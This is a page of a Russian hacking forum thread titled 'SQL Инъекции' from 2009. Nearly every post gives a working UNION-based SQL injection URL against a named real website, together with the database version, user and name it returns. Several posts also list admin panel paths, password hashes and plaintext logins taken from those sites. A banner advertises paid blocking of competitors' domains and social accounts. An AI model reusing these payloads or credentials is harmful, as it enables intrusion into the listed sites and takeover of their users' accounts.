Форум АНТИЧАТ - SQL Инъекции

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
SQL Инъекции

Страница 975 из 1242

975

Опции темы

Поиск в этой теме

Опции просмотра

#9741

07.06.2009, 19:18

RulleR

Reservists Of Antichat - Level 6

Регистрация: 12.06.2008

Сообщений: 157

Провел на форуме:
3217552

Репутация: 1668

Отправить сообщение для RulleR с помощью ICQ

Отправить сообщение для RulleR с помощью Yahoo

[PR 5]

Код:

http://www.basementsystems.com/testimonials/view.php?id=-1472+union+select+1,2,3,4,concat_ws(0x3a,version(),database(),user()),6,7,8,9,10,11,12,13,14

4.1.22-log:basementsystems:root@localhost

[PR 4]

Код:

http://www.guidedways.com/mobile/purchase.php?id=-24+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10--&affcode=gw&ref=qfrm

5.0.81-community-log:fahagi3_truth:fahagi3_data@localhost

[PR 1]

Код:

http://www.clickoff.ru/purchase.php?id=-5+union+select+1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8,9,10,11,12

4.1.22-standard:hyperco_clickoff:hyperco_admin@localhost

[PR 0]

Код:

http://www.sparrowscripts.com/purchase.php?id=-1+union+select+1,concat_ws(0x3a,version(),database(),user())

5.0.67-community:axelance_root:axelance_root@localhost

#9742

07.06.2009, 19:31

~~farex~~

Banned

Регистрация: 11.03.2009

Сообщений: 214

Провел на форуме:
914766

Репутация: 317

<<Интернет магзин книг>>

Код:

http://www.cocos.com.ua/?wiev_t=-3371+union+select+1,concat_ws(0x3a2a3a,version(),database(),user(),@@version_compile_os),3,4,5,6,7,8,9,0,1,2,3,4--+

4.1.22-standard-log:*:cocosco_bdutfcocosco:*:cocosco_adm@localhost :*:unknown-linux-gnu

Админка

Код:

http://www.cocos.com.ua/serv/

#9743

07.06.2009, 20:01

Kimliksiz

Познающий

Регистрация: 07.05.2009

Сообщений: 31

Провел на форуме:
137000

Репутация: 96

http://www.ahtopolbg.com/index.php?option=com_mosres&task=showregion&regID= 4%27+and+1=2+union%20select%201,concat(username,0x 3a,password)+from+jos_users/*&lang=bg

nitAdmin:acdee303eabfd82b1233004b17468c0f

#9744

07.06.2009, 20:07

Gorev

Познавший АНТИЧАТ

Регистрация: 31.03.2006

Сообщений: 1,167

Провел на форуме:
4072944

Репутация: 1550

Отправить сообщение для Gorev с помощью ICQ

Отправить сообщение для Gorev с помощью Yahoo

http://www.fereastra.ro/stiri/stire.php?code=-3446+UNION+SELECT+1,concat_ws(0x3a,version(),datab ase(),useR(),@@version_compile_os),3,4,5

Database Version: 4.1.22-standard-log
Database name: frstr_fereastra
User name: frstr_admin@localhost
Os : pc-linux-gnu

Последний раз редактировалось Gorev; 07.06.2009 в 20:48..

БК кланы :(

#9745

07.06.2009, 20:30

S00pY

Познающий

Регистрация: 24.04.2007

Сообщений: 92

Провел на форуме:
2621544

Репутация: 412

Отправить сообщение для S00pY с помощью ICQ

БК кланы :(

/*-------------------------------------------------------------------------------*/

Код:

_http://www.marlenus.ru/news.php?id=-938'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13/*

version():5.0.27-log
user():bkclan@localhost
database():marlenus_bkclan
adminka
Табла:site_admins
Столбц:username,pswd
Vbulletin
Табла:user
Столбц:username,password,email,icq,salt
/*-------------------------------------------------------------------------------*/

Код:

_http://shaolin-clan.lv/index.php?pg=1&id=-500'+union+select+1,2,3,4,5,6,7,8--+

version():5.0.37-Max
user():shaolinbase@localhost
database():shaolinbase
adminka
Табла:web_login
Столбц:id,login,pass,nick,info,name,class
phpbb forum
Табла: phpbb_users
Столбц:username,user_password
/*-------------------------------------------------------------------------------*/

Код:

_http://chroniclers.ws/index.php?mod=commentnews&id=-411+union+select+1,2,3,4,5,6,7,8,9--

version():5.0.67.d7-ourdelta-log
user()

apsru57_bw@68.178.254.16
database()

apsru57_bw
adminka
Табла:site_user
Столбц:id,name,password,email,combats_login, active,ip_address
/*-------------------------------------------------------------------------------*/

Код:

_http://wboys.ru/comment/?id=13867'+and+substring(@@version,1,1)=5--+

Впадло крутить

Код:

_http://wboys.ru/gallery/?nick=grip_x29'+union+select+1,2,3,4,5,6,7,8,9--+&p=1

тоже вроде без принта
/*-------------------------------------------------------------------------------*/

#9746

07.06.2009, 23:43

AlexSatter

Постоянный

Регистрация: 29.01.2009

Сообщений: 333

Провел на форуме:
1168802

Репутация: 298

ТИЦ 240
http://www.sibmech.ru/import.php?title=-57+union+select+concat_ws(0x3a,version(),user(),da tabase())

вывод в title
4.1.22-log:sibmech_mysql@10.1.48.196:sibmech_db
удалось найти таблицу users

содержимое таблицы users ввиде: id:login

assword

Код:

1:admin:36696630cfdec3fa4702cc6c5d6d574a
5:dub14:eda4e674e1e13f224704f4b481a0ccf3
7:test:449bca0569d57b807c0567694640293a
8:denis:eda4e674e1e13f224704f4b481a0ccf3
9:user:b7ee47e9cc42e0d00bdf6dbb4f702d8a

Админка: http://www.sibmech.ru/admin/

#9747

08.06.2009, 06:25

-JC-

Познающий

Регистрация: 10.03.2009

Сообщений: 54

Провел на форуме:
110312

Репутация: 50

Отправить сообщение для -JC- с помощью ICQ

http://zdeg.sao.mos.ru/news.php?cat=-1+union+select+1,2,concat_ws(0x3a,user(),database( ),version())/*

#9748

08.06.2009, 07:43

MaSTeR GэN

Участник форума

Регистрация: 23.05.2008

Сообщений: 121

Провел на форуме:
305110

Репутация: 133

Отправить сообщение для MaSTeR GэN с помощью ICQ

k106fm.com pr 5

Код:

http://www.k106fm.com/event_details.php?eventid=-4101+union+select+1,2,3,4,5,unhex(hex(concat_ws(0x0,version(),user(),database())))--

Данные БД:

Database Version: 5.0.15-nt-log
Database name: rsl
User name: rsl@seth.ebtech.net

Админка по адресу:
http://www.k106fm.com/admin/

из таблицы bl_admin:
user=fox
md5=d5ce3d032734f16ee2c30bdb094b6e20

#9749

08.06.2009, 08:46

AlexSatter

Постоянный

Регистрация: 29.01.2009

Сообщений: 333

Провел на форуме:
1168802

Репутация: 298

http://95c.ru/shop.php?ID=-462+union+select+1,2,3,4,concat_ws(0x3a,version(), user(),database()),6,7,8,9,10,11,12,13,14,15,16,17 ,18,19
4.1.25:sauna95c@localhost:95c

---------------

http://aquacabina.ru/shop.php?IDC=5&IDS=1554534534534+union+select+1,2, 3,concat_ws(0x3a,version(),user(),database())/*
4.1.25:dushnews@localhost:newdush

-------------

http://aqua-box.ru/shop.php?ID=-7+union+select+1,2,3,concat_ws(0x3a,version(),user (),database())
5.0.81:vanna@localhost:bs

таблиц с пользователями нет.

Последний раз редактировалось AlexSatter; 08.06.2009 в 08:54..

#9750

08.06.2009, 13:34

udman

Постоянный

Регистрация: 21.04.2009

Сообщений: 321

Провел на форуме:
785842

Репутация: 239

http://www.cyprusadvertiser.com

Цитата:

http://www.cyprusadvertiser.com/misc.php?id=-30'+UNION+SELECT+0,1,2,concat_ws(0x0b,user(),datab ase(),versi on())+/*

cyprusadv_vkaic@91.186.20.11
cyprusadv_vkaic
5.0.32-Debian_7etch1~bpo.1-log

Юсеры

Цитата:

http://www.cyprusadvertiser.com/misc.php?id=-30'+UNION+SELECT+0,1,2,concat_ws(0x0b,password,log in,email)+FROM+u sers+LIMIT+0,1+/*

куда вводить не нашел )
Лохин: grammateas
Пасс: secretary

Лохин: archive
Пасс: thankyou

Лохин: igor2
Пасс: blah2

Страница 975 из 1242

975

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая	k00p3r	Чужие Статьи	0	13.06.2005 11:26
SQL инъекция и Oracle, часть 2	k00p3r	Чужие Статьи	0	13.06.2005 11:24
Sql инъекция и Oracle, часть первая	k00p3r	Чужие Статьи	0	13.06.2005 11:23
Внедрение Sql кода с завязанными глазами	k00p3r	Чужие Статьи	0	12.06.2005 20:48
SQL Injection в Oracle	k00p3r	Чужие Статьи	0	12.06.2005 12:41

Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)

Быстрый переход